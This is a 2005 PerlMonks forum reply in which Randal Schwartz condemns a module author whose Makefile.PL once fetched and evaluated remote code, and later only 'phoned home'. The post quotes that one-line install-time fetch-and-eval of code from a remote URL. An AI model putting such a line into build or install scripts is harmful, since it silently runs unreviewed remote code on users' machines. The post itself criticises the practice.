Beefy Boxes and Bandwidth Generously Provided by pair Networks
Just another Perl shrine
 
PerlMonks  

Re^5: Advice Choosing a Templating System

by merlyn (Sage)
on Mar 02, 2005 at 19:58 UTC ( [id://435992]=note: print w/replies, xml ) Need Help??


in reply to Re^4: Advice Choosing a Templating System
in thread Advice Choosing a Templating System

It was more than that. Although they merely "phone home" now, they originally did the equivalent of:
use LWP::Simple; eval get "http://his.box/secret/url.cgi";
Anyone who would try to put such code in a Makefile.PL without adequate notification obviously doesn't "play well with others". It also had to be explained to him, repeatedly, before he decided that it should only phone home instead of doing this!

While I also object to "phone home", I really object to anyone who would be either naive enough or inconsiderate enough to put code like this in their Makefile.PL.

It's also enough to make me automatically distrust any of his past or future work. And as I said, I don't make this judgement lightly.

-- Randal L. Schwartz, Perl hacker
Be sure to read my standard disclaimer if this is a reply.

Log In?
Username:
Password:

What's my password?
Create A New User
Domain Nodelet?
Node Status?
node history
Node Type: note [id://435992]
help
Chatterbox?
and the web crawler heard nothing...

How do I use this?Last hourOther CB clients
Other Users?
Others taking refuge in the Monastery: (3)
As of 2024-04-24 04:46 GMT
Sections?
Information?
Find Nodes?
Leftovers?
    Voting Booth?

    No recent polls found